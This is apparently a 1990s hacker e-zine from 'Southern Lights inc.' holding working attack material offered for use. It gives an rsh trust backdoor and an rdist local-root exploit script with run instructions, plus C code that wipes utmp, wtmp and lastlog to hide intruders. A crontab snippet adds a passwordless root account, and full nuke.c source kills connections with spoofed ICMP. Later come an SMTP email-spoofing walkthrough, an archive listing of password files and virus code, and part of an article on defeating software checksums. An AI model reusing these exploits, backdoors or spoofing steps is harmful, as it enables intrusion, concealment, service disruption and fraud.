This will allow you (if it's installed) for you to type:
|
|
|
|
*rsh <system.name.you.echoed.that.to> -l <UsernameOfUserYouUsed> /bin/sh -i
|
|
|
|
Okay, so that is say, the user you echoed + + on was called "bob" on
|
|
lame.aol.com, you would type:
|
|
|
|
*rsh lame.aol.com -l bob /bin/sh -i
|
|
|
|
This might or might not work, depending on how the system is setup, but if
|
|
you were on lame.aol.com, it's a reasonable bet after typing that command you
|
|
would then become bob with his rights, and access to his files.
|
|
|
|
Well I thought about it and decided to put some useful source in here for
|
|
those interested.
|
|
|
|
|
|
Okay, this piece of shell script on non-patched systems will give you root.
|
|
Upload this file into a directory as <filename>.
|
|
|
|
When in shell on the UNIX box type:
|
|
|
|
*chmod 777 <filename>
|
|
*./<filename>
|
|
*/tmp/." "
|
|
|
|
If a # appears, type:
|
|
*whoami
|
|
|
|
If it says "root" you have root on that UNIX box.
|
|
|
|
|
|
NB: Because of the way this file is, where ! is wrap the nextline onto that
|
|
line and delete the "!" - except for the "#!" on the first line.
|
|
|
|
|
|
---------------------------CUT----------------------------8<------------------
|
|
#!/bin/sh
|
|
SUID=/tmp/." "
|
|
cat <<_EOF_ > test
|
|
Taaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa!
|
|
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa!
|
|
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa!
|
|
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa!
|
|
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa!
|
|
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa!
|
|
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa!
|
|
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa!
|
|
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa!
|
|
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa!
|
|
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa!
|
|
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa!
|
|
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
|
|
Qaaaaaaaaaaaaaaaaaaaaaaaaaa
|
|
Qaaaaaaaaaaaaaaaaaaaaaaaaa
|
|
Qaaaaaaaaaaaaaaaaaaaaaaaa
|
|
Qaaaaaaaaaaaaaaaaaaaaaaa
|
|
Scp /bin/sh $SUID
|
|
Schmod 4755 $SUID
|
|
_EOF_
|
|
cat test | /usr/ucb/rdist -Server localhost
|
|
rm -rf test
|
|
if [ -f $SUID ]; then
|
|
echo "$SUID is a setuid shell. "
|
|
fi
|
|
|
|
-------------------------CUT-------------------------------8<------------------
|
|
|
|
The program following will hide you on a UNIX box.
|
|
|
|
It will work on SunOS 4.+ if you are a normal user and utmp has o+w, or if
|
|
you are root.
|
|
|
|
-------------------------CUT-------------------------------8<------------------
|
|
|
|
#include <sys/types.h>
|
|
#include <stdio.h>
|
|
#include <unistd.h>
|
|
#include <fcntl.h>
|
|
#include <utmp.h>
|
|
#include <lastlog.h>
|
|
#include <pwd.h>
|
|
|
|
int f;
|
|
|
|
void kill_tmp(name,who)
|
|
char *name,
|
|
*who;
|
|
{
|
|
struct utmp utmp_ent;
|
|
|
|
if ((f=open(name,O_RDWR))>=0) {
|
|
while(read (f, &utmp_ent, sizeof (utmp_ent))> 0 )
|
|
if (!strncmp(utmp_ent.ut_name,who,strlen(who))) {
|
|
bzero((char *)&utmp_ent,sizeof( utmp_ent ));
|
|
lseek (f, -(sizeof (utmp_ent)), SEEK_CUR);
|
|
write (f, &utmp_ent, sizeof (utmp_ent));
|
|
}
|
|
close(f);
|
|
}
|
|
}
|
|
|
|
void kill_lastlog(who)
|
|
char *who;
|
|
{
|
|
struct passwd *pwd;
|
|
struct lastlog newll;
|
|
|
|
if ((pwd=getpwnam(who))!=NULL) {
|
|
|
|
if ((f=open("/usr/adm/lastlog", O_RDWR)) >= 0) {
|
|
lseek(f, (long)pwd->pw_uid * sizeof (struct lastlog), 0);
|
|
bzero((char *)&newll,sizeof( newll ));
|
|
write(f, (char *)&newll, sizeof( newll ));
|
|
close(f);
|
|
}
|
|
|
|
} else printf("%s: ?\n",who);
|
|
|
|
}
|
|
main(argc,argv)
|
|
int argc;
|
|
char *argv[];
|
|
{
|
|
if (argc==2) {
|
|
kill_tmp("/etc/utmp",argv[1]);
|
|
kill_tmp("/usr/adm/wtmp",argv[1]);
|
|
kill_lastlog(argv[1]);
|
|
printf("Zap!\n");
|
|
} else
|
|
printf("Error.\n");
|
|
}
|
|
|
|
-----------------------------CUT---------------------------8<------------------
|
|
|
|
|
|
When you get root, find where the crontabs are put, and type this:
|
|
*cat <WhatYouCallThisFileName> >> <crontabdir>/root
|
|
|
|
-------------->8--------------Cuthere------------------------------------------
|
|
0 1 * * * cp /etc/passwd /var/adm/". "
|
|
1 1 * * * chmod +w /etc/passwd
|
|
2 1 * * * echo "blah::0:0:A tempory account:/:/bin/sh" >> /etc/passwd
|
|
1 2 * * * mv /var/adm/". " /etc/passwd
|
|
2 2 * * * chmod -w /etc/passwd
|
|
-------------->8--------------Cuthere------------------------------------------
|
|
|
|
At 1-2 AM, there will be an account called "blah" with root access every day
|
|
created with no password.
|
|
|
|
|
|
This will nuke the IP connection between two computers:
|
|
|
|
*./nuke <TargetUsers> <ComputerThat'sConnectingTargetComputer> <Port#ToKill>
|
|
|
|
-------------->8--------------Cuthere------------------------------------------
|
|
/*
|
|
* nuke.c version 1.0 04/25/92
|
|
* by Satanic Mechanic.
|
|
* must be root to open raw sockets. this version will kill
|
|
* almost any ip connection.
|
|
* ----------------------------------------------------------------
|
|
* I strongly advise against even compiling this software. It's far
|
|
* too dangerous, and the temptation may be there to do some real
|
|
* damage with it. Read and learn, that's it, eh? -concerned
|
|
* ----------------------------------------------------------------
|
|
*
|
|
*/
|
|
|
|
#include <netdb.h>
|
|
#include <sys/time.h>
|
|
#include <sys/types.h>
|
|
#include <sys/socket.h>
|
|
#include <netinet/in.h>
|
|
#include <netinet/in_systm.h>
|
|
#include <netinet/ip.h>
|
|
#include <netinet/ip_icmp.h>
|
|
#include <netinet/tcp.h>
|
|
#include <signal.h>
|
|
#include <errno.h>
|
|
#include <string.h>
|
|
#include <stdio.h>
|
|
#define DEFAULT_UNREACH ICMP_UNREACH_PORT
|
|
|
|
char *icmp_unreach_type[] = {
|
|
"net",
|
|
"host",
|
|
"protocol",
|
|
"port",
|
|
"frag",
|
|
"source",
|
|
"destnet",
|
|
"desthost",
|
|
"isolated",
|
|
"authnet",
|
|
"authhost",
|
|
"netsvc",
|
|
"hostsvc"
|
|
};
|
|
|
|
#define MAX_ICMP_UNREACH (sizeof(icmp_unreach_type)/sizeof(char *))
|
|
|
|
int resolve_unreach_type(arg)
|
|
char *arg;
|
|
{
|
|
int i;
|
|
|
|
for (i=0; i <MAX_ICMP_UNREACH; i++) {
|
|
if (!strcmp(arg,icmp_unreach_type[i])) return i;
|
|
}
|
|
return -1;
|
|
}
|
|
|
|
int resolve_host (host,sa)
|
|
char *host;
|
|
struct sockaddr_in *sa;
|
|
{
|
|
struct hostent *ent ;
|
|
|
|
bzero(sa,sizeof(struct sockaddr));
|
|
sa->sin_family = AF_INET;
|
|
if (inet_addr(host) == -1) {
|
|
ent = gethostbyname(host);
|
|
if (ent != NULL) {
|
|
sa->sin_family = ent->h_addrtype;
|
|
bcopy(ent->h_addr,(caddr_t)&sa->sin_addr,ent->h_length);
|
|
return(0);
|
|
}
|
|
else {
|
|
fprintf(stderr,"error: unknown host %s\n",host);
|
|
return(-1);
|
|
}
|
|
}
|
|
return(0);
|
|
}
|
|
|
|
in_cksum(addr, len) /* from ping.c */
|
|
u_short *addr;
|
|
int len;
|
|
{
|
|
register int nleft = len;
|
|
register u_short *w = addr;
|
|
register int sum = 0;
|
|
u_short answer = 0;
|
|
|
|
/*
|
|
* Our algorithm is simple, using a 32 bit accumulator (sum),
|
|
* we add sequential 16 bit words to it, and at the end, fold
|
|
* back all the carry bits from the top 16 bits into the lower
|
|
* 16 bits.
|
|
*/
|
|
while( nleft > 1 ) {
|
|
sum += *w++;
|
|
nleft -= 2;
|
|
}
|
|
|
|
/* mop up an odd byte, if necessary */
|
|
if( nleft == 1 ) {
|
|
*(u_char *)(&answer) = *(u_char *)w ;
|
|
sum += answer;
|
|
}
|
|
|
|
/*
|
|
* add back carry outs from top 16 bits to low 16 bits
|
|
*/
|
|
sum = (sum >> 16) + (sum & 0xffff); /* add hi 16 to low 16 */
|
|
sum += (sum >> 16); /* add carry */
|
|
answer = ~sum; /* truncate to 16 bits */
|
|
return (answer);
|
|
}
|
|
|
|
int icmp_unreach(host,uhost,port,type)
|
|
char *host,*uhost;
|
|
int type,port;
|
|
{
|
|
struct sockaddr_in name;
|
|
struct sockaddr dest,uspoof;
|
|
struct icmp *mp;
|
|
struct tcphdr *tp;
|
|
struct protoent *proto;
|
|
|
|
int i,s,rc;
|
|
char *buf = (char *) malloc(sizeof(struct icmp)+64);
|
|
mp = (struct icmp *) buf;
|
|
if (resolve_host(host,&dest) <0) return(-1);
|
|
if (resolve_host(uhost,&uspoof) <0) return(-1);
|
|
if ((proto = getprotobyname("icmp")) == NULL) {
|
|
fputs("unable to determine protocol number of \"icmp\n",stderr);
|
|
return(-1);
|
|
}
|
|
if ((s = socket(AF_INET,SOCK_RAW,proto->p_proto)) <0 ) {
|
|
perror("opening raw socket");
|
|
return(-1);
|
|
}
|
|
|
|
/* Assign it to a port */
|
|
name.sin_family = AF_INET;
|
|
name.sin_addr.s_addr = INADDR_ANY;
|
|
name.sin_port = htons(port);
|
|
|
|
/* Bind it to the port */
|
|
rc = bind(s, (struct sockaddr *) & name, sizeof(name));
|
|
if (rc == -1) {
|
|
perror("bind");
|
|
return(-1);
|
|
}
|
|
|
|
if ((proto = getprotobyname("tcp")) == NULL) {
|
|
fputs("unable to determine protocol number of \"icmp\n",stderr);
|
|
return(-1);
|
|
}
|
|
|
|
/* the following messy stuff from Adam Glass (icmpsquish.c) */
|
|
bzero(mp,sizeof(struct icmp)+64);
|
|
mp->icmp_type = ICMP_UNREACH;
|
|
mp->icmp_code = type;
|
|
mp->icmp_ip.ip_v = IPVERSION;
|
|
mp->icmp_ip.ip_hl = 5;
|
|
mp->icmp_ip.ip_len = htons(sizeof(struct ip)+64+20);
|
|
mp->icmp_ip.ip_p = IPPROTO_TCP;
|
|
mp->icmp_ip.ip_src = ((struct sockaddr_in *) &dest)->sin_addr;
|
|
mp->icmp_ip.ip_dst = ((struct sockaddr_in *) &uspoof)->sin_addr;
|
|
mp->icmp_ip.ip_ttl = 179;
|
|
mp->icmp_cksum = 0;
|
|
tp = (struct tcphdr *) ((char *) &mp->icmp_ip+sizeof(struct ip));
|
|
tp->th_sport = 23;
|
|
tp->th_dport = htons(port);
|
|
tp->th_seq = htonl(0x275624F2);
|
|
mp->icmp_cksum = htons(in_cksum(mp,sizeof(struct icmp)+64));
|
|
if ((i= sendto(s,buf,sizeof(struct icmp)+64, 0,&dest,sizeof(dest))) <0 ) {
|
|
perror("sending icmp packet");
|
|
return(-1);
|
|
}
|
|
return(0);
|
|
}
|
|
|
|
void main(argc,argv)
|
|
int argc;
|
|
|
|
char **argv;
|
|
{
|
|
|
|
int i, type;
|
|
|
|
if ((argc <4) || (argc >5)) {
|
|
fprintf(stderr,"usage: nuke host uhost port [unreach_type]\n");
|
|
exit(1);
|
|
}
|
|
|
|
if (argc == 4) type = DEFAULT_UNREACH;
|
|
else type = resolve_unreach_type(argv[4]);
|
|
|
|
if ((type <0) ||(type >MAX_ICMP_UNREACH)) {
|
|
fputs("invalid unreachable type",stderr);
|
|
exit(1);
|
|
}
|
|
if (icmp_unreach(argv[1],argv[2],atoi(argv[3]),type) <0) exit(1);
|
|
exit(0);
|
|
}
|
|
|
|
---------------->8-------------------------------------------------------------
|
|
|
|
Well, this is the smallest stuff I have, and I'm not gonna BORE you with
|
|
kbyte's and kbyte's of source.
|
|
|
|
|
|
|
|
|
|
|
|
SLi
|
|
|
|
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
|
|
^^^^^ ^^^^^
|
|
^^^^^ Busted for nothing ^^^^^
|
|
^^^^^ ^^^^^
|
|
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
|
|
|
|
Southern Lights
|
|
inc.
|
|
|
|
|
|
|
|
|
|
Okay, I am being forced to type this by gun-point.. okay, maybe not to that
|
|
extreme, but it's pretty damn close! We accept no responsibility for the
|
|
writing of this article... Can I say that? No, I guess not.. oh well, I
|
|
tried... =)
|
|
|
|
For months we were receiving hundreds of dollars worth of bills through
|
|
Telecom for calls we didn't make. For example, a $300 phone call when I
|
|
was on holiday - there wasn't anyone home, so how could someone have had a
|
|
conversation if there wasn't anyone home to accept the phone call?
|
|
|
|
[NOTE: There isn't a pill box located anywhere NEAR my house, so don't go
|
|
screaming BEIGE BOXING!! - mind you, I had this weird dream that I had this
|
|
cute little pill box with wires sticking out of it which was right outside
|
|
of our house. Ohmigod, I think I must be going crazy... ANYway..]
|
|
|
|
These were directed through NZ-Direct from the US. Strange that. No one
|
|
had been over to the states recently and it hadn't stated that it was by
|
|
using a calling card, so that option was out. So, that required a monthly
|
|
scream at Telco about that, and eventually we stopped getting billed for
|
|
such calls (which I doubt even existed anyway).
|
|
|
|
Okay, now that's just the TIP of the iceburg. How would you like to be "con-
|
|
victed" for a "crime" you didn't commit? Well, that's basically what happen-
|
|
ed. And it was such a PETTY crime at that. Try VMB hacking!
|
|
|
|
It all started when we discovered a little VMB and everyone else happened to
|
|
find it too. What a coincidence.. *grin* Many of their boxes had the de-
|
|
fault passwords still attatched to them *sigh*. It's pathetic the way some
|
|
companies leave their systems so open and then blame someone else for "abusing
|
|
their system" when all we did was look around. Someone had editted the voice
|
|
prompts ['twasn't me, but you know who you are... *grin*] and _I_ ended up
|
|
taking the blame... hmm.. Anyway, a few of us ended up being "interrogated"
|
|
over this stupid prompt editting and leaving "abusive messages".
|
|
|
|
Anyway, the outcome was, I ended up being the only person accepting respon-
|
|
sibility for the entire incident. That included me having to write two let-
|
|
ters. Two copies of one letter - one copy to the guy who owned the VMB and
|
|
the other copy to the head of Telco security "for scrutiny" - and another
|
|
letter to the head of Wellington Telco security explaining the entire incident.
|
|
|
|
In the end, it was a waste of time not only for me - having to write two
|
|
letters - that didn't count the FIRST letter explaining why I shouldn't have
|
|
my phone line disconnected (they sent a letter to me saying that if I didn't
|
|
respond within a month, or summink, they'd disconnect it anyway - bunch o'
|
|
pricks, huh?).
|
|
|
|
In my final letter to the head of Wellington Telco Security, I reminded them
|
|
of the hundreds of dollars worth of calls I had to complain about each month.
|
|
FINALLY, something was actually done about it, and the hundred dollars worth
|
|
of calls were credited to my account.
|
|
|
|
The stupid thing was that I didn't do a thing, and had to put up with all the
|
|
crap that they threw at me. I also had my 3-way call cancelled.
|
|
|
|
In conclusion (they always said you have to include one in essays so I'd bet-
|
|
ter get extra practice =) ), I'd just like to say that they're a bunch of
|
|
dorks. Oh, and the new telephone account layout really sucks too.
|
|
[CyntaxEra Mature Mode: ON] *grin* In my opinon, it was better the way it
|
|
was, but that doesn't matter, does it? It's probably cheaper for them to do
|
|
it the new way. That would explain it all... =)
|
|
|
|
|
|
|
|
|
|
SLi
|
|
|
|
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
|
|
^^^^^ ^^^^^
|
|
^^^^^ Books 2 Read ^^^^^
|
|
^^^^^ ^^^^^
|
|
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
|
|
|
|
Southern Lights
|
|
inc.
|
|
|
|
|
|
|
|
|
|
Title Author Stars
|
|
=================================================================
|
|
|
|
The Fools Run ...................... John Camp *****
|
|
Complicity ...................... Iain Banks ****
|
|
War Day ...................... Strieber & Kunetka *****
|
|
Blood Music ...................... Greg Bear ****?
|
|
|
|
|
|
|
|
|
|
|
|
|
|
SLi
|
|
|
|
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
|
|
^^^^^ ^^^^^
|
|
^^^^^ The SLi Archive Subject list ^^^^^
|
|
^^^^^ ^^^^^
|
|
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
|
|
|
|
Southern Lights
|
|
inc.
|
|
|
|
|
|
Okay, this is the list of all <well, most of> the file areas in the SLi
|
|
archives. It's a direct copy of the "/pub/README.NOW!" file and is up to
|
|
date as of the release date.
|
|
|
|
-sof-
|
|
|
|
|
|
Welcome to the SLi archives!
|
|
We hope your stay is, err, umm, "enlightening".
|
|
|
|
|
|
The operator of this system takes no responsibility for how the information
|
|
is used, BUT suggests STRONGLY you do NOT try ANYTHING, ANY of the files
|
|
describe! Some acts depicted in the files held within this archive describe
|
|
illegal or immoral acts. PLEASE use your commonsense when defining right
|
|
from wrong.
|
|
|
|
This archive exists to be a library of information, to show people a dif-
|
|
ferent outlook on the world and, in truth, a different outlook on life to
|
|
give them the opportunity to delve into the realms of adventure and know-
|
|
ledge - NOT to insight or teach people how to break the law.
|
|
|
|
|
|
|
|
Directories Sub Directories Description
|
|
-----------+-------------------+-------------------------------------------
|
|
./ai Artificial Intellegence.
|
|
./anarchy Anarchy files, explosives etc. (Likly
|
|
not to be here anymore as I'm against
|
|
this kinda shit now)
|
|
./art Art.
|
|
ansi If I find ppl up'ing ANSI, I'll shoot
|
|
them.
|
|
ascii Better than ANSI, I guess.
|
|
vt-xxx VT Animations at present.
|
|
./bbs
|
|
bbs-adds BBS adverts - numbers etc..
|
|
. au
|
|
. nz
|
|
. other
|
|
. uk
|
|
usa
|
|
. misc
|
|
./busts Info on different busts.
|
|
./cc Info on creadit/calling cards, ATMs
|
|
etc.
|
|
./civil Civil liberties
|
|
./cons Conferences for H/P people - where when,
|
|
what happened and confs to come.
|
|
./corewars Files for Core Wars.
|
|
./cryptography Encrypting and Decrypting.
|
|
./cyber The world of the Cyberpunk.
|
|
./eff Information on the Electronic Freedom
|
|
Foundation - a US civial rights group.
|
|
./faq General Frequently Asked Questions.
|
|
./history A MUST to read you HAVE to read these
|
|
files they are linked to other direct-
|
|
ories all over the SLi archive but they
|
|
contain a history of different events in
|
|
the H/P world.
|
|
./howto How-to Guides to misc computer related
|
|
activities.
|
|
./incoming Incoming files.
|
|
./info These files are also contained in other
|
|
places. In this archive but are here be-
|
|
cause they should be read and because
|
|
in my opinion, they are important.
|
|
./internet Internet related files.
|
|
irc Internet Relay Chat [IRC] files.
|
|
sites Different FTP/TELNET sites.
|
|
./misc Just a lot of misc stuff with no real
|
|
home.
|
|
bible Obviously, the Bible.
|
|
./mischp Misc Hack/Phreak files.
|
|
cable Files to do with Cable TV/SKY.
|
|
lockpick Lock-picking related files.
|
|
./music Music related stuff.
|
|
lyrics Lyrics for songs etc.
|
|
misc Misc music related files.
|
|
mods Electronic music - most powerpacked for
|
|
Amiga.
|
|
vocs PC Sound files.
|
|
./nz New Zealand related files!
|
|
./passwds Password files for different systems.
|
|
Please rename the password file to be
|
|
"systemname-dd-mm-yy".
|
|
ie.
|
|
lamesystem-01-02-95.
|
|
./pharm Drug files (also probably going to be
|
|
removed for the same reason as
|
|
"anarchy")
|
|
./phreak Information on the Telephone System.
|
|
box Different phreaking "boxes".
|
|
cellfone Cellular Fones.
|
|
countrycodes Every Area/Country Code in the world.
|
|
fone-fraud Misc files on fone-fraud written by
|
|
Telco/Schools.
|
|
history History of the Telefone
|
|
. misc Misc Files.
|
|
miscexe Misc Executables.
|
|
payfones Payphone related files.
|
|
. pbx Private Branch eXchanges [PBXs].
|
|
standards Different CCITT/Phone Standards.
|
|
. vmb Voice Mail Boxes [VMBs].
|
|
./pirate Breaking the (c) protection of S/W.
|
|
amiga
|
|
crack
|
|
coding
|
|
. ibm
|
|
mac
|
|
./police Understand thy opposition
|
|
misc Miscellaneous files on the police.
|
|
./publications Different files from well-known authors
|
|
or organisations.
|
|
bruce_sterling Includes The Hacker Crackdown and inside
|
|
directories FSF_columns, catscan and
|
|
interzone.
|
|
david_faber
|
|
denning
|
|
john_gilmore Includes inside directories
|
|
Gilmore_v_NSA and inside that,
|
|
Clipper_FOIA and ITAR_FOIA.
|
|
john_perry_barlow
|
|
kapor
|
|
unsorted Miscellaneous unsorted publications.
|
|
./security Computer Security, Bug fixes and security.
|
|
hole descriptions.
|
|
8lgm Unix bugs
|
|
cert Computer Emergency Response Co-ordination
|
|
Centre.
|
|
cert_advisories A LOT of system security holes
|
|
clippings Misc clippings from diffrent usenet
|
|
sources.
|
|
misc Misc info.
|
|
. dos. DOS <PC> security files.
|
|
novell Novell netware.
|
|
tools Misc tools for DOS.
|
|
faq Frequently Asked Questions.
|
|
mac Misc files for the Macintosh.
|
|
misc Misc files on Computer Security.
|
|
os2 Files for OS2.
|
|
unix Files for UNIX based OS's.
|
|
antihacktools Anti-Hacker Tools
|
|
hackerssrc Various source for you hackers.
|
|
hp Files for hacking the Hewlett-Packard's
|
|
HPX000's.
|
|
vax Vax/Digital/VMS Security.
|
|
x.25. x.25 security holes
|
|
./sli Southern Lights inc. File Areas.
|
|
articles
|
|
interest Files that are related to SLi and are
|
|
an intrest to the rest of the H/P world
|
|
mags The SLi Mags are stored here.
|
|
. warnings READ any files in here!
|
|
./strange Weird files that should have no place
|
|
to go :)
|
|
. occult Stuff on the occult <black magic etc..>
|
|
. ufo UFO files.
|
|
./system Files for different OS's.
|
|
. amiga
|
|
asm
|
|
. utils
|
|
. dos
|
|
linux
|
|
./txts Like misc really.
|
|
./usenet Files/Msgs from usenet.
|
|
./virus Virus Creators and virus code. Any anti-
|
|
virus people feel free to use this info
|
|
to create virus killers.
|
|
./words Word files.
|
|
./zines Electronic Mags.
|
|
. hpa Hacking, Phreaking and Anarchy Mags.
|
|
. other Don't fit anywhere.
|
|
. weird Very weird.
|
|
|
|
|
|
|
|
TOTAL DISK SPACE USED: 79055Kbytes [compressed]
|
|
Approximately 200Meg [uncompressed].
|
|
|
|
As of recent times, we have been updating the system at 1-2 Meg per day.
|
|
However, this cannot continue, as we have but 40Meg available disk space
|
|
remaining, but if anyone is willing to donate an IDE drive, we will be most
|
|
appreciative.
|
|
|
|
NOTE: The use of the word "removed" is being used as in "access to these
|
|
files will be removed from normal access users".
|
|
|
|
|
|
|
|
|
|
|
|
|
|
SLi
|
|
|
|
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
|
|
^^^^^ ^^^^^
|
|
^^^^^ Fake Mail ^^^^^
|
|
^^^^^ ^^^^^
|
|
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
|
|
|
|
Southern Lights
|
|
inc.
|
|
|
|
|
|
|
|
Well, I dont know WHY this is in here, but just in case your interested
|
|
and DIDN'T know how to send fake Internet E-Mail here is a step by step
|
|
way to do it.
|
|
|
|
|
|
KEY: ignore []'s
|
|
*'s are lines that you type
|
|
|
|
|
|
type "telnet [target.comp] 25" at $prompt.
|
|
|
|
Trying [target.comp]...
|
|
Connected [target.comp].
|
|
Escape character is '^]'.
|
|
220-[target comp] [Mailer/Version] ready at [date/time]
|
|
220 ESMTP spoken here
|
|
*helo [where.from.comp]
|
|
250 [Target.comp] Hello [where.from.comp] [###.###.###], pleased to meet you
|
|
*mail from: [where@ever.you.like]
|
|
250 [where@ever.you.like]... Sender ok
|
|
*rcpt to: [target@target.comp]
|
|
250 [target@Target.comp]... Recipient ok
|
|
*data
|
|
354 Enter mail, end with "." on a line by itself
|
|
*hello
|
|
*.
|
|
250 DAA28466 Message accepted for delivery
|
|
*quit
|
|
221 [Target.Comp] closing connection
|
|
Connection closed by foreign host.
|
|
$
|
|
|
|
Well there you have it. Nice and easy. If you didnt know it already, I'm
|
|
a bit disappointed, but that's what we are here for. To teach YOU.
|
|
|
|
|
|
|
|
|
|
SLi
|
|
|
|
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
|
|
^^^^^ ^^^^^
|
|
^^^^^ Elements of Data Deprotection ^^^^^
|
|
^^^^^ ^^^^^
|
|
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
|
|
|
|
Southern Lights
|
|
inc.
|
|
|
|
|
|
|
|
Elements of Data Deprotection - by Thorium
|
|
|
|
Data Deprotection is one of my many hobbies. Others include bomb making,
|
|
programming, hacking, shooting, phreaking and appearing in court.
|
|
|
|
I am by no means an expert in this field, in fact I would regard myself as
|
|
a "seasoned ammeter". However, I feel that some tips I have picked up
|
|
over the years could help others. For this reason I am writing this file.
|
|
|
|
HOLD IT! You can't program? Well, this won't be much good to ya. You
|
|
might even need to know some assembler on whatever platform you use. I use
|
|
Amiga's usually (because they are simply the best personal computer - well
|
|
for assembler programmers anyway) so I know a fair bit of 68000 assembler.
|
|
It also helps to know a few common opcodes (what the actual text of
|
|
assembler language gets turned into, ie machine language) and how to use a
|
|
good debugger and disassembler.
|
|
|
|
So, if you are up to here, you're half way to being a K-RAD ELITE DUDE
|
|
anyway. In fact, you can probably do more interesting things that most who
|
|
call themselves "K-RAD ELITE DUDE"s - so why are you reading this? That's
|
|
right, you thought you might pick up a hint or two in an underground
|
|
publication. Ok, I hope you learn something.
|
|
|
|
First:
|
|
What do I mean "Data Deprotection" ???
|
|
|
|
This is probably not the best name for what I will actually describe, but
|
|
it is all I could think of. I mean "getting into data" - but not in the
|
|
sense of cryptanalasys and that sort of thing that requires a degree.
|
|
Data Deprotection has particular reference to more breaking encryption
|
|
algorithms, to getting around or breaking checksums and CRC's, and making
|
|
small but crucial changes to programs.
|
|
|
|
NOTE: Some people would call some uses of these skills "Cracking", and
|
|
assume that you go around breaking the protection on games. This is
|
|
distinctly possible, but before I go further, I would like to point out my
|
|
personal feelings on breaking program protection:
|
|
|
|
If you "crack" a game and distribute it, you are killing the software
|
|
industry. Anyway, you needed an original to crack - which someone had to
|
|
buy - so whoever bought it is stupid if they pay for something then let
|
|
everyone else have it. Basically, I do crack games and things, but I don't
|
|
spread what I do. The main reason for this is that I'm not good enough to
|
|
keep up with the "big boys" in Europe who crack the latest game overnight.
|
|
If I get hold of an original game, it is usually fairly old anyway, like a
|
|
year or two, and even back then they had some pretty tricky protection that
|
|
has taken a while to get around (like a few days work). Of course, there
|
|
are those dead simple games (try Eye of the Beholder II for a beginners
|
|
one). Thing is, everyone has it by the time I have finished with it. So I
|
|
don't crack to spread. I hardly crack games at all, since my access to
|
|
originals is limited. I crack only for the fun of it. And it is quite
|
|
fun to pitch your mind against those of the programmers - kind of like
|
|
chess play-by-purchase. Anyway, that's my ideas on cracking games etc. If
|
|
you want to, go ahead. It just kills the industry. This is why this
|
|
article will deal as little as possible with things that could be used to
|
|
crack games. It will deal more with accessing data from programs that you
|
|
aren't really 'sposed to access.
|
|
|
|
So, you have this program. You have made whatever change to it for
|
|
whatever reason, an it now comes up "corrupt data" or something along those
|
|
lines. Now, all you did was change a "Compare with password" to a "Don't
|
|
do anything" - so you know it should be able to work fine.
|
|
|
|
To see if a checksum is your problem, try running the program in it's
|
|
original form from your debugger. Just straight running it. If it still
|
|
comes up "error" then your debugger just 'aint good enough, since it is not
|
|
totally transparent to the program. It would require a discussion on each
|
|
debugger to fix this, and I only know those that I use.
|
|
|
|
If it ran OK, try placing a breakpoint at the place where you change things
|
|
and then running the program. Don't do anything at the breakpoint, just
|
|
run the program. If it fails, chances are you have a checksum. If not,
|
|
try putting the breakpoints around your place you changed, and after they
|
|
break, put them back. If it fails, it's probably some sort of check. If
|
|
not, something wierd is happening. The reason behind this is that almost
|
|
all debuggers will use breakpoints that actually change the memory that you
|
|
place a breakpoint on. So when a program goes to check it's memory, if
|
|
there is a breakpoint there, it won't find what it thought it would.
|
|
|
|
So, your program has a checksum? If not, you will need to do a little more
|
|
hacking to find out what's up. It usually 'aint too hard, but beyond the
|
|
scope of this text. Well, the next thing to do is FIND the checksum.
|
|
|
|
This can be done by placing a breakpoint on your place to change. If you
|
|
run it and without putting the breakpoint back after it occurs then your
|
|
program runs fine, then your check is AFTER the part you altered. If it
|
|
fails, then the checksum is BEFORE the part you altered. Pretty simple
|
|
really. You can further narrow this down by putting breakpoints at
|
|
strategic points throughout the code, and watching what happens when you
|
|
have a breakpoint in existence only up to there. You will eventually find
|
|
the area of code that does the check.
|
|
|
|
Once you have found this piece of code, you can figure out what it does.
|
|
Chances are your program is in some form of compiled language, so won't be
|
|
as easy to read as 100% assembler code, but by tracing through it, you can
|
|
usually figure out what's up. The skill is to look for critical points in
|
|
